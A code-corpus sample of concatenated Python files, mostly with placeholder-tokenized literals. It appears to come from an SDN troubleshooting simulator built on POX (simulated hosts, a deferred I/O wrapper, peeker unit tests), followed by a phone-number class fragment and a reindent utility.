"<STR_LIT>" % self . extension <EOL> if self . country_code_source is not None : <EOL> result += "<STR_LIT>" % self . country_code_source <EOL> if self . preferred_domestic_carrier_code is not None : <EOL> result += ( "<STR_LIT>" % <EOL> self . preferred_domestic_carrier_code ) <EOL> return result <EOL> class FrozenPhoneNumber ( PhoneNumber , ImmutableMixin ) : <EOL> """<STR_LIT>""" <EOL> def __hash__ ( self ) : <EOL> return hash ( ( self . country_code , <EOL> self . national_number , <EOL> self . extension , <EOL> self . italian_leading_zero , <EOL> self . raw_input , <EOL> self . country_code_source , <EOL> self . 
preferred_domestic_carrier_code ) ) <EOL> @ mutating_method <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> if len ( kwargs ) == <NUM_LIT:0> and len ( args ) == <NUM_LIT:1> and isinstance ( args [ <NUM_LIT:0> ] , PhoneNumber ) : <EOL> super ( FrozenPhoneNumber , self ) . __init__ ( ** args [ <NUM_LIT:0> ] . __dict__ ) <EOL> else : <EOL> super ( FrozenPhoneNumber , self ) . __init__ ( * args , ** kwargs ) </s>
<s> """<STR_LIT>""" </s>
<s> from . models import Message <EOL> def soapbox_messages ( request ) : <EOL> """<STR_LIT>""" <EOL> return { <EOL> '<STR_LIT>' : Message . objects . match ( request . path ) <EOL> } </s>
<s> from config . experiment_config_lib import ControllerConfig <EOL> from sts . topology import MeshTopology , BufferedPatchPanel <EOL> from sts . control_flow . interactive import Interactive <EOL> from sts . input_traces . input_logger import InputLogger <EOL> from sts . simulation_state import SimulationConfig <EOL> start_cmd = "<STR_LIT>" <EOL> controllers = [ ControllerConfig ( start_cmd , cwd = "<STR_LIT>" , address = "<STR_LIT:127.0.0.1>" , port = <NUM_LIT> ) ] <EOL> topology_class = MeshTopology <EOL> topology_params = "<STR_LIT>" <EOL> simulation_config = SimulationConfig ( controller_configs = controllers , <EOL> topology_class = topology_class , <EOL> topology_params = topology_params ) <EOL> control_flow = Interactive ( simulation_config , input_logger = InputLogger ( ) ) </s>
<s> """<STR_LIT>""" <EOL> import abc <EOL> from itertools import count <EOL> import logging <EOL> from pox . openflow . software_switch import DpPacketOut <EOL> from pox . lib . revent import EventMixin <EOL> from pox . lib . packet . ethernet import ethernet <EOL> from pox . lib . packet . ipv4 import ipv4 <EOL> from pox . lib . packet . tcp import tcp <EOL> from pox . lib . packet . arp import arp <EOL> from pox . lib . addresses import EthAddr <EOL> from pox . lib . addresses import IPAddr <EOL> import sts . util . network_namespace as ns <EOL> from sts . util . convenience import object_fullname <EOL> from sts . util . convenience import class_fullname <EOL> from sts . util . convenience import load_class <EOL> class HostInterfaceAbstractClass ( object ) : <EOL> """<STR_LIT>""" <EOL> __metaclass__ = abc . ABCMeta <EOL> def __init__ ( self , hw_addr , ips = None , name = "<STR_LIT>" ) : <EOL> self . hw_addr = hw_addr <EOL> ips = [ ] if ips is None else ips <EOL> self . ips = ips if isinstance ( ips , list ) else [ ips ] <EOL> self . name = name <EOL> @ abc . abstractproperty <EOL> def port_no ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> @ abc . abstractproperty <EOL> def _hw_addr_hash ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> @ abc . abstractproperty <EOL> def _ips_hashes ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def __hash__ ( self ) : <EOL> """<STR_LIT>""" <EOL> hash_code = self . _hw_addr_hash <EOL> for ip_hash in self . _ips_hashes : <EOL> hash_code += ip_hash <EOL> hash_code += self . name . __hash__ ( ) <EOL> return hash_code <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" + self . name + "<STR_LIT::>" + str ( self . hw_addr ) + "<STR_LIT::>" + str ( self . ips ) <EOL> def __repr__ ( self ) : <EOL> return self . 
__str__ ( ) <EOL> def to_json ( self ) : <EOL> """<STR_LIT>""" <EOL> return { <EOL> '<STR_LIT>' : object_fullname ( self ) , <EOL> '<STR_LIT:name>' : self . name , <EOL> '<STR_LIT>' : [ ip . toStr ( ) for ip in self . ips ] , <EOL> '<STR_LIT>' : self . hw_addr . toStr ( ) } <EOL> @ classmethod <EOL> def from_json ( cls , json_hash ) : <EOL> """<STR_LIT>""" <EOL> assert class_fullname ( cls ) == json_hash [ '<STR_LIT>' ] <EOL> name = json_hash [ '<STR_LIT:name>' ] <EOL> ips = [ ] <EOL> for ip in json_hash [ '<STR_LIT>' ] : <EOL> ips . append ( IPAddr ( str ( ip ) ) ) <EOL> hw_addr = EthAddr ( json_hash [ '<STR_LIT>' ] ) <EOL> return cls ( hw_addr , ip_or_ips = ips , name = name ) <EOL> class HostInterface ( HostInterfaceAbstractClass ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , hw_addr , ip_or_ips = None , name = "<STR_LIT>" ) : <EOL> if isinstance ( hw_addr , basestring ) : <EOL> hw_addr = EthAddr ( hw_addr ) <EOL> ips = [ ] if ip_or_ips is None else ip_or_ips <EOL> ips = ips if isinstance ( ips , list ) else [ ips ] <EOL> for i in range ( len ( ips ) ) : <EOL> if isinstance ( ips [ i ] , basestring ) : <EOL> ips [ <NUM_LIT:0> ] = IPAddr ( ips [ i ] ) <EOL> super ( HostInterface , self ) . __init__ ( hw_addr , ips , name ) <EOL> @ property <EOL> def port_no ( self ) : <EOL> return self . hw_addr . toStr ( ) <EOL> def __eq__ ( self , other ) : <EOL> if type ( other ) != HostInterface : <EOL> return False <EOL> if self . hw_addr . toInt ( ) != other . hw_addr . toInt ( ) : <EOL> return False <EOL> other_ip_ints = [ ip_addr . toUnsignedN ( ) for ip_addr in other . ips ] <EOL> for ip_addr in self . ips : <EOL> if ip_addr . toUnsignedN ( ) not in other_ip_ints : <EOL> return False <EOL> if len ( other . ips ) != len ( self . ips ) : <EOL> return False <EOL> if self . name != other . name : <EOL> return False <EOL> return True <EOL> @ property <EOL> def _ips_hashes ( self ) : <EOL> hashes = [ ip . toUnsignedN ( ) . __hash__ ( ) for ip in self . 
ips ] <EOL> return hashes <EOL> @ property <EOL> def _hw_addr_hash ( self ) : <EOL> return self . hw_addr . toInt ( ) . __hash__ ( ) <EOL> def __str__ ( self , * args , ** kwargs ) : <EOL> return "<STR_LIT>" + self . name + "<STR_LIT::>" + str ( self . hw_addr ) + "<STR_LIT::>" + str ( self . ips ) <EOL> def __repr__ ( self , * args , ** kwargs ) : <EOL> return self . __str__ ( ) <EOL> class HostAbstractClass ( object ) : <EOL> """<STR_LIT>""" <EOL> __metaclass__ = abc . ABCMeta <EOL> _hids = count ( <NUM_LIT:1> ) <EOL> def __init__ ( self , interfaces , name = "<STR_LIT>" , hid = None ) : <EOL> """<STR_LIT>""" <EOL> interfaces = [ ] if interfaces is None else interfaces <EOL> self . _interfaces = interfaces <EOL> if not isinstance ( interfaces , list ) : <EOL> self . _interfaces = [ interfaces ] <EOL> self . _hid = hid if hid is not None else self . _hids . next ( ) <EOL> self . _name = name if name else "<STR_LIT>" % self . _hid <EOL> @ property <EOL> def interfaces ( self ) : <EOL> return self . _interfaces <EOL> @ property <EOL> def name ( self ) : <EOL> return self . _name <EOL> @ property <EOL> def hid ( self ) : <EOL> return self . _hid <EOL> @ abc . abstractmethod <EOL> def send ( self , interface , packet ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> @ abc . abstractmethod <EOL> def receive ( self , interface , packet ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def has_port ( self , port ) : <EOL> """<STR_LIT>""" <EOL> return port in self . interfaces <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . name , self . hid ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % self . hid <EOL> def to_json ( self ) : <EOL> """<STR_LIT>""" <EOL> return { '<STR_LIT>' : object_fullname ( self ) , <EOL> '<STR_LIT:name>' : self . name , <EOL> '<STR_LIT>' : self . hid , <EOL> '<STR_LIT>' : [ iface . to_json ( ) for iface in self . 
interfaces ] } <EOL> @ classmethod <EOL> def from_json ( cls , json_hash , interface_cls = None ) : <EOL> name = json_hash [ '<STR_LIT:name>' ] <EOL> hid = json_hash [ '<STR_LIT>' ] <EOL> interfaces = [ ] <EOL> for iface in json_hash [ '<STR_LIT>' ] : <EOL> if interface_cls is None : <EOL> interface_cls = load_class ( iface [ '<STR_LIT>' ] ) <EOL> else : <EOL> iface [ '<STR_LIT>' ] = class_fullname ( interface_cls ) <EOL> interfaces . append ( interface_cls . from_json ( iface ) ) <EOL> return cls ( interfaces , name , hid ) <EOL> class Host ( HostAbstractClass , EventMixin ) : <EOL> """<STR_LIT>""" <EOL> _eventMixin_events = set ( [ DpPacketOut ] ) <EOL> _hids = count ( <NUM_LIT:1> ) <EOL> def __init__ ( self , interfaces , name = "<STR_LIT>" , hid = None ) : <EOL> """<STR_LIT>""" <EOL> super ( Host , self ) . __init__ ( interfaces , name , hid ) <EOL> self . log = logging . getLogger ( name ) <EOL> self . send_capabilities = False <EOL> def send ( self , interface , packet ) : <EOL> """<STR_LIT>""" <EOL> self . log . info ( "<STR_LIT>" % ( interface . name , <EOL> str ( packet ) ) ) <EOL> self . raiseEvent ( DpPacketOut ( self , packet , interface ) ) <EOL> def receive ( self , interface , packet ) : <EOL> """<STR_LIT>""" <EOL> if packet . type == ethernet . ARP_TYPE : <EOL> arp_reply = self . _check_arp_reply ( packet ) <EOL> if arp_reply is not None : <EOL> self . log . info ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( interface . name , str ( packet ) ) ) <EOL> self . send ( interface , arp_reply ) <EOL> return arp_reply <EOL> else : <EOL> self . log . info ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( interface . name , str ( packet ) ) ) <EOL> return None <EOL> elif ( self . send_capabilities and packet . type == ethernet . IP_TYPE and <EOL> packet . next . protocol == ipv4 . ICMP_PROTOCOL ) : <EOL> self . log . info ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( interface . name , str ( packet ) ) ) <EOL> t = tcp ( ) <EOL> tcp . RST = True <EOL> i = ipv4 ( ) <EOL> i . protocol = ipv4 . 
TCP_PROTOCOL <EOL> i . srcip = interface . ips [ <NUM_LIT:0> ] <EOL> i . dstip = packet . next . srcip <EOL> i . payload = t <EOL> ether = ethernet ( ) <EOL> ether . type = ethernet . IP_TYPE <EOL> ether . src = interface . hw_addr <EOL> ether . dst = packet . src <EOL> ether . payload = i <EOL> self . send ( interface , ether ) <EOL> self . log . info ( "<STR_LIT>" <EOL> "<STR_LIT:%s>" % ( str ( packet ) , interface . name ) ) <EOL> def _check_arp_reply ( self , arp_packet ) : <EOL> """<STR_LIT>""" <EOL> arp_packet_payload = arp_packet . payload <EOL> if arp_packet_payload . opcode == arp . REQUEST : <EOL> interface_matched = self . _if_valid_arp_request ( arp_packet_payload ) <EOL> if interface_matched is None : <EOL> return None <EOL> else : <EOL> arp_reply = arp ( ) <EOL> arp_reply . hwsrc = interface_matched . hw_addr <EOL> arp_reply . hwdst = arp_packet_payload . hwsrc <EOL> arp_reply . opcode = arp . REPLY <EOL> arp_reply . protosrc = arp_packet_payload . protodst <EOL> arp_reply . protodst = arp_packet_payload . protosrc <EOL> ether = ethernet ( ) <EOL> ether . type = ethernet . ARP_TYPE <EOL> ether . src = interface_matched . hw_addr <EOL> ether . dst = arp_packet . src <EOL> ether . payload = arp_reply <EOL> return ether <EOL> def _if_valid_arp_request ( self , arp_request_payload ) : <EOL> """<STR_LIT>""" <EOL> for interface in self . interfaces : <EOL> if arp_request_payload . protodst in interface . ips : <EOL> return interface <EOL> return None <EOL> @ property <EOL> def dpid ( self ) : <EOL> return self . hid <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . name , self . hid ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % self . hid <EOL> class NamespaceHost ( Host ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , interfaces , create_io_worker , name = "<STR_LIT>" , hid = None , <EOL> cmd = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> super ( NamespaceHost , self ) . 
__init__ ( interfaces = interfaces , name = name , <EOL> hid = hid ) <EOL> assert len ( self . interfaces ) == <NUM_LIT:1> , ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> interface = self . interfaces [ <NUM_LIT:0> ] <EOL> self . cmd = cmd <EOL> ( self . guest , guest_eth_addr , host_device ) = ns . launch_namespace ( <EOL> cmd , interface . ips [ <NUM_LIT:0> ] . toStr ( ) , self . hid , guest_hw_addr = interface . hw_addr ) <EOL> self . socket = ns . bind_raw_socket ( host_device ) <EOL> self . io_worker = create_io_worker ( self . socket ) <EOL> self . io_worker . set_receive_handler ( self . _io_worker_receive_handler ) <EOL> assert interface . hw_addr == EthAddr ( guest_eth_addr ) <EOL> if name in [ "<STR_LIT>" , None ] : <EOL> self . _name = "<STR_LIT>" + interface . ips [ <NUM_LIT:0> ] . toStr ( ) <EOL> self . log = logging . getLogger ( self . name ) <EOL> def _io_worker_receive_handler ( self , io_worker ) : <EOL> """<STR_LIT>""" <EOL> message = io_worker . peek_receive_buf ( ) <EOL> packet = ethernet ( raw = message ) <EOL> if not packet . parsed : <EOL> return <EOL> io_worker . consume_receive_buf ( packet . hdr_len + packet . payload_len ) <EOL> self . log . info ( "<STR_LIT>" % str ( packet ) ) <EOL> super ( NamespaceHost , self ) . send ( self . interfaces [ <NUM_LIT:0> ] , packet ) <EOL> def receive ( self , interface , packet ) : <EOL> """<STR_LIT>""" <EOL> self . log . info ( "<STR_LIT>" % <EOL> ( interface . name , str ( packet ) ) ) <EOL> self . io_worker . send ( packet . pack ( ) ) <EOL> def to_json ( self ) : <EOL> """<STR_LIT>""" <EOL> return { '<STR_LIT>' : object_fullname ( self ) , <EOL> '<STR_LIT:name>' : self . name , <EOL> '<STR_LIT>' : self . hid , <EOL> '<STR_LIT>' : self . cmd , <EOL> '<STR_LIT>' : [ iface . to_json ( ) for iface in self . 
interfaces ] } <EOL> @ classmethod <EOL> def from_json ( cls , json_hash , create_io_worker ) : <EOL> name = json_hash [ '<STR_LIT:name>' ] <EOL> hid = json_hash [ '<STR_LIT>' ] <EOL> cmd = json_hash [ '<STR_LIT>' ] <EOL> interfaces = [ ] <EOL> for iface in json_hash [ '<STR_LIT>' ] : <EOL> iface_cls = load_class ( iface [ '<STR_LIT>' ] ) <EOL> interfaces . append ( iface_cls . from_json ( iface ) ) <EOL> return cls ( interfaces , create_io_worker = create_io_worker , name = name , <EOL> hid = hid , cmd = cmd ) </s>
'''A pass-through wrapper around an io_worker that can be "blocked":
while blocked, outgoing sends and incoming data are queued; on unblock
they are flushed in FIFO order.'''
import logging
import Queue
log = logging.getLogger()


class DeferredIOWorker(object):
    '''Decorator/proxy over an io_worker.  While block() is in effect,
    send() calls and received data are buffered in queues; unblock()
    replays them in arrival order.'''

    def __init__(self, io_worker):
        self._io_worker = io_worker
        # Interpose on the underlying worker's receive path.
        self._io_worker.set_receive_handler(self.io_worker_receive_handler)
        # FIFO queues used only while blocked.
        self._receive_queue = Queue.Queue()
        self._send_queue = Queue.Queue()
        # Bytes received but not yet consumed by the client handler.
        self._receive_buf = "<STR_LIT>"
        self._currently_blocked = False

    def block(self):
        '''Start deferring sends and receives.'''
        self._currently_blocked = True

    def unblock(self):
        '''Stop deferring; flush queued sends first, then queued receives.
        NOTE(review): the flag is cleared before draining, so handlers
        invoked during the drain see the worker as unblocked.'''
        self._currently_blocked = False
        while not self._send_queue.empty():
            data = self._send_queue.get()
            self._actual_send(data)
        while not self._receive_queue.empty():
            data = self._receive_queue.get()
            self._actual_receive(data)

    def send(self, data):
        '''Send immediately, or queue if currently blocked.'''
        if self._currently_blocked:
            self._send_queue.put(data)
        else:
            self._actual_send(data)

    def _actual_send(self, data):
        # Delegate to the wrapped worker.
        self._io_worker.send(data)

    def _actual_receive(self, data):
        # Append to our buffer and notify the client, passing ourselves so
        # the client peeks/consumes through this proxy.
        self._receive_buf += data
        self._client_receive_handler(self)

    def set_receive_handler(self, block):
        '''Register the client's receive callback (called with this proxy).'''
        self._client_receive_handler = block

    def peek_receive_buf(self):
        '''Return buffered received bytes without consuming them.'''
        return self._receive_buf

    def consume_receive_buf(self, l):
        '''Drop the first l bytes of the receive buffer.'''
        assert (len(self._receive_buf) >= l)
        self._receive_buf = self._receive_buf[l:]

    def io_worker_receive_handler(self, io_worker):
        '''Receive path from the wrapped worker: drain its buffer entirely,
        then deliver now or queue for later depending on blocked state.'''
        data = io_worker.peek_receive_buf()
        io_worker.consume_receive_buf(len(data))
        if self._currently_blocked:
            self._receive_queue.put(data)
        else:
            self._actual_receive(data)

    @property
    def currently_blocked(self):
        '''True while block() is in effect.'''
        return self._currently_blocked

    # Thin delegations so this proxy is drop-in select()-able / closeable.
    def fileno(self):
        return self._io_worker.fileno()

    def close(self):
        self._io_worker.close()

    @property
    def closed(self):
        return self._io_worker.closed

    @property
    def socket(self):
        return self._io_worker.socket
<s> import unittest <EOL> import sys <EOL> import os <EOL> import signal <EOL> from sts . control_flow . peeker import * <EOL> from tests . unit . sts . event_dag_test import MockInternalEvent <EOL> from tests . unit . sts . mcs_finder_test import MockInputEvent <EOL> from sts . replay_event import InternalEvent , ConnectToControllers <EOL> from sts . event_dag import EventDag <EOL> from config . experiment_config_lib import ControllerConfig <EOL> from sts . simulation_state import SimulationConfig <EOL> from sts . util . convenience import IPAddressSpace <EOL> import logging <EOL> sys . path . append ( os . path . dirname ( __file__ ) + "<STR_LIT>" ) <EOL> _running_simulation = None <EOL> def handle_int ( sigspec , frame ) : <EOL> print >> sys . stderr , "<STR_LIT>" % sigspec <EOL> if _running_simulation is not None : <EOL> _running_simulation . current_simulation . clean_up ( ) <EOL> raise RuntimeError ( "<STR_LIT>" % sigspec ) <EOL> signal . signal ( signal . SIGINT , handle_int ) <EOL> signal . signal ( signal . SIGTERM , handle_int ) <EOL> class MockConnectToControllers ( ConnectToControllers ) : <EOL> def __init__ ( self , fingerprint = None , ** kwargs ) : <EOL> super ( MockConnectToControllers , self ) . __init__ ( ** kwargs ) <EOL> self . _fingerprint = fingerprint <EOL> self . prunable = False <EOL> @ property <EOL> def fingerprint ( self ) : <EOL> return self . _fingerprint <EOL> def proceed ( self , simulation ) : <EOL> return True <EOL> class MockSnapshotter ( object ) : <EOL> def snapshot_proceed ( * args ) : <EOL> pass <EOL> class PeekerTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . input_trace = [ MockInputEvent ( fingerprint = ( "<STR_LIT:class>" , f ) ) for f in range ( <NUM_LIT:1> , <NUM_LIT:7> ) ] <EOL> self . dag = EventDag ( self . input_trace ) <EOL> self . prefix_peeker = PrefixPeeker ( None ) <EOL> IPAddressSpace . _claimed_addresses . clear ( ) <EOL> ControllerConfig . _controller_labels . 
clear ( ) <EOL> controller_cfg = ControllerConfig ( start_cmd = "<STR_LIT>" ) <EOL> simulation_cfg = SimulationConfig ( controller_configs = [ controller_cfg ] ) <EOL> self . snapshot_peeker = SnapshotPeeker ( simulation_cfg , <EOL> default_dp_permit = True ) <EOL> self . snapshot_peeker . setup_simulation = lambda : ( None , None ) <EOL> self . snapshot_peeker . snapshot_and_play_forward = lambda * args : ( [ ] , None ) <EOL> self . snapshot_peeker . replay_interval = lambda * args : [ ] <EOL> self . mock_snapshotter = MockSnapshotter ( ) <EOL> def test_basic_noop ( self ) : <EOL> """<STR_LIT>""" <EOL> events = [ MockConnectToControllers ( fingerprint = ( "<STR_LIT:class>" , <NUM_LIT:0> ) ) ] + [ MockInputEvent ( fingerprint = ( "<STR_LIT:class>" , f ) ) for f in range ( <NUM_LIT:1> , <NUM_LIT:7> ) ] <EOL> new_dag = self . prefix_peeker . peek ( EventDag ( events ) ) <EOL> self . assertEquals ( events , new_dag . events ) <EOL> new_dag = self . snapshot_peeker . peek ( EventDag ( events ) ) <EOL> self . assertEquals ( events , new_dag . events ) <EOL> def test_basic_no_prune ( self ) : <EOL> inp1 = MockConnectToControllers ( fingerprint = "<STR_LIT:a>" ) <EOL> inp2 = MockInputEvent ( fingerprint = "<STR_LIT:b>" ) <EOL> int1 = MockInternalEvent ( fingerprint = "<STR_LIT:c>" ) <EOL> inp3 = MockInputEvent ( fingerprint = "<STR_LIT:d>" ) <EOL> events = [ inp1 , inp2 , int1 , inp3 ] <EOL> def fake_find_internal_events ( replay_dag , inject_input , wait_time ) : <EOL> if inject_input == inp1 : <EOL> return [ ] <EOL> elif inject_input == inp2 : <EOL> return [ int1 ] <EOL> elif inject_input == inp3 : <EOL> return [ ] <EOL> else : <EOL> raise AssertionError ( "<STR_LIT>" % replay_dag . events ) <EOL> self . prefix_peeker . find_internal_events = fake_find_internal_events <EOL> new_dag = self . prefix_peeker . peek ( EventDag ( events ) ) <EOL> self . assertEquals ( events , new_dag . 
events ) <EOL> def snapshotter_fake_find_internal_events ( s , c , dag_interval , <EOL> inject_input , wait_time ) : <EOL> return ( fake_find_internal_events ( dag_interval , inject_input , wait_time ) , self . mock_snapshotter ) <EOL> self . snapshot_peeker . find_internal_events = snapshotter_fake_find_internal_events <EOL> new_dag = self . snapshot_peeker . peek ( EventDag ( events ) ) <EOL> self . assertEquals ( events , new_dag . events ) <EOL> def test_basic_prune ( self ) : <EOL> inp2 = MockConnectToControllers ( fingerprint = "<STR_LIT:b>" ) <EOL> int1 = MockInternalEvent ( fingerprint = "<STR_LIT:c>" ) <EOL> inp3 = MockInputEvent ( fingerprint = "<STR_LIT:d>" ) <EOL> int2 = MockInternalEvent ( fingerprint = "<STR_LIT:e>" ) <EOL> sub_events = [ inp2 , int1 , inp3 , int2 ] <EOL> def fake_find_internal_events ( replay_dag , inject_input , wait_time ) : <EOL> if inject_input == inp2 : <EOL> return [ ] <EOL> elif inject_input == inp3 : <EOL> return [ int2 ] <EOL> else : <EOL> raise AssertionError ( "<STR_LIT>" % replay_dag . events ) <EOL> self . prefix_peeker . find_internal_events = fake_find_internal_events <EOL> new_dag = self . prefix_peeker . peek ( EventDag ( sub_events ) ) <EOL> self . assertEquals ( [ inp2 , inp3 , int2 ] , new_dag . events ) <EOL> def snapshotter_fake_find_internal_events ( s , c , dag_interval , <EOL> inject_input , wait_time ) : <EOL> return ( fake_find_internal_events ( dag_interval , inject_input , wait_time ) , self . mock_snapshotter ) <EOL> self . snapshot_peeker . find_internal_events = snapshotter_fake_find_internal_events <EOL> new_dag = self . snapshot_peeker . peek ( EventDag ( sub_events ) ) <EOL> self . assertEquals ( [ inp2 , inp3 , int2 ] , new_dag . events ) </s>
<s> """<STR_LIT>""" <EOL> __version__ = "<STR_LIT:1>" <EOL> import tokenize <EOL> import os , shutil <EOL> import sys <EOL> verbose = <NUM_LIT:0> <EOL> recurse = <NUM_LIT:0> <EOL> dryrun = <NUM_LIT:0> <EOL> makebackup = True <EOL> def usage ( msg = None ) : <EOL> if msg is not None : <EOL> print >> sys . stderr , msg <EOL> print >> sys . stderr , __doc__ <EOL> def errprint ( * args ) : <EOL> sep = "<STR_LIT>" <EOL> for arg in args : <EOL> sys . stderr . write ( sep + str ( arg ) ) <EOL> sep = "<STR_LIT:U+0020>" <EOL> sys . stderr . write ( "<STR_LIT:\n>" ) <EOL> def main ( ) : <EOL> import getopt <EOL> global verbose , recurse , dryrun , makebackup <EOL> try : <EOL> opts , args = getopt . getopt ( sys . argv [ <NUM_LIT:1> : ] , "<STR_LIT>" , <EOL> [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> except getopt . error , msg : <EOL> usage ( msg ) <EOL> return <EOL> for o , a in opts : <EOL> if o in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> dryrun += <NUM_LIT:1> <EOL> elif o in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> recurse += <NUM_LIT:1> <EOL> elif o in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> makebackup = False <EOL> elif o in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> verbose += <NUM_LIT:1> <EOL> elif o in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> usage ( ) <EOL> return <EOL> if not args : <EOL> r = Reindenter ( sys . stdin ) <EOL> r . run ( ) <EOL> r . write ( sys . stdout ) <EOL> return <EOL> for arg in args : <EOL> check ( arg ) <EOL> def check ( file ) : <EOL> if os . path . isdir ( file ) and not os . path . islink ( file ) : <EOL> if verbose : <EOL> print "<STR_LIT>" , file <EOL> names = os . listdir ( file ) <EOL> for name in names : <EOL> fullname = os . path . join ( file , name ) <EOL> if ( ( recurse and os . path . isdir ( fullname ) and <EOL> not os . path . islink ( fullname ) and <EOL> not os . path . split ( fullname ) [ <NUM_LIT:1> ] . startswith ( "<STR_LIT:.>" ) ) <EOL> or name . lower ( ) . 
endswith ( "<STR_LIT>" ) ) : <EOL> check ( fullname ) <EOL> return <EOL> if verbose : <EOL> print "<STR_LIT>" , file , "<STR_LIT>" , <EOL> try : <EOL> f = open ( file ) <EOL> except IOError , msg : <EOL> errprint ( "<STR_LIT>" % ( file , str ( msg ) ) ) <EOL> return <EOL> r = Reindenter ( f ) <EOL> f . close ( ) <EOL> if r . run ( ) : <EOL> if verbose : <EOL> print "<STR_LIT>" <EOL> if dryrun : <EOL> print "<STR_LIT>" <EOL> if not dryrun : <EOL> bak = file + "<STR_LIT>" <EOL> if makebackup : <EOL> shutil . copyfile ( file , bak ) <EOL> if verbose : <EOL> print "<STR_LIT>" , file , "<STR_LIT:to>" , bak <EOL> f = open ( file , "<STR_LIT:w>" ) <EOL> r . write ( f ) <EOL> f . close ( ) <EOL> if verbose : <EOL> print "<STR_LIT>" , file <EOL> return True <EOL> else : <EOL> if verbose : <EOL> print "<STR_LIT>" <EOL> return False <EOL> def _rstrip ( line , JUNK = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> i = len ( line ) <EOL> while i > <NUM_LIT:0> and line [ i - <NUM_LIT:1> ] in JUNK : <EOL> i -= <NUM_LIT:1> <EOL> return line [ : i ] <EOL> class Reindenter : <EOL> def __init__ ( self , f ) : <EOL> self . find_stmt = <NUM_LIT:1> <EOL> self . level = <NUM_LIT:0> <EOL> self . raw = f . readlines ( ) <EOL> self . lines = [ _rstrip ( line ) . expandtabs ( ) + "<STR_LIT:\n>" <EOL> for line in self . raw ] <EOL> self . lines . insert ( <NUM_LIT:0> , None ) <EOL> self . index = <NUM_LIT:1> <EOL> self . stats = [ ] <EOL> def run ( self ) : <EOL> tokenize . tokenize ( self . getline , self . tokeneater ) <EOL> lines = self . lines <EOL> while lines and lines [ - <NUM_LIT:1> ] == "<STR_LIT:\n>" : <EOL> lines . pop ( ) <EOL> stats = self . stats <EOL> stats . append ( ( len ( lines ) , <NUM_LIT:0> ) ) <EOL> have2want = { } <EOL> after = self . after = [ ] <EOL> i = stats [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> after . 
extend ( lines [ <NUM_LIT:1> : i ] ) <EOL> for i in range ( len ( stats ) - <NUM_LIT:1> ) : <EOL> thisstmt , thislevel = stats [ i ] <EOL> nextstmt = stats [ i + <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> have = getlspace ( lines [ thisstmt ] ) <EOL> want = thislevel * <NUM_LIT:2> <EOL> if want < <NUM_LIT:0> : <EOL> if have : <EOL> want = have2want . get ( have , - <NUM_LIT:1> ) <EOL> if want < <NUM_LIT:0> : <EOL> for j in xrange ( i + <NUM_LIT:1> , len ( stats ) - <NUM_LIT:1> ) : <EOL> jline , jlevel = stats [ j ] <EOL> if jlevel >= <NUM_LIT:0> : <EOL> if have == getlspace ( lines [ jline ] ) : <EOL> want = jlevel * <NUM_LIT:2> <EOL> break <EOL> if want < <NUM_LIT:0> : <EOL> for j in xrange ( i - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ) : <EOL> jline , jlevel = stats [ j ] <EOL> if jlevel >= <NUM_LIT:0> : <EOL> want = have + getlspace ( after [ jline - <NUM_LIT:1> ] ) - getlspace ( lines [ jline ] ) <EOL> break <EOL> if want < <NUM_LIT:0> : <EOL> want = have <EOL> else : <EOL> want = <NUM_LIT:0> <EOL> assert want >= <NUM_LIT:0> <EOL> have2want [ have ] = want <EOL> diff = want - have <EOL> if diff == <NUM_LIT:0> or have == <NUM_LIT:0> : <EOL> after . extend ( lines [ thisstmt : nextstmt ] ) <EOL> else : <EOL> for line in lines [ thisstmt : nextstmt ] : <EOL> if diff > <NUM_LIT:0> : <EOL> if line == "<STR_LIT:\n>" : <EOL> after . append ( line ) <EOL> else : <EOL> after . append ( "<STR_LIT:U+0020>" * diff + line ) <EOL> else : <EOL> remove = min ( getlspace ( line ) , - diff ) <EOL> after . append ( line [ remove : ] ) <EOL> return self . raw != self . after <EOL> def write ( self , f ) : <EOL> f . writelines ( self . after ) <EOL> def getline ( self ) : <EOL> if self . index >= len ( self . lines ) : <EOL> line = "<STR_LIT>" <EOL> else : <EOL> line = self . lines [ self . index ] <EOL> self . index += <NUM_LIT:1> <EOL> return line <EOL> def tokeneater ( self , type , token , ( sline , scol ) , end , line , <EOL> INDENT = tokenize . 
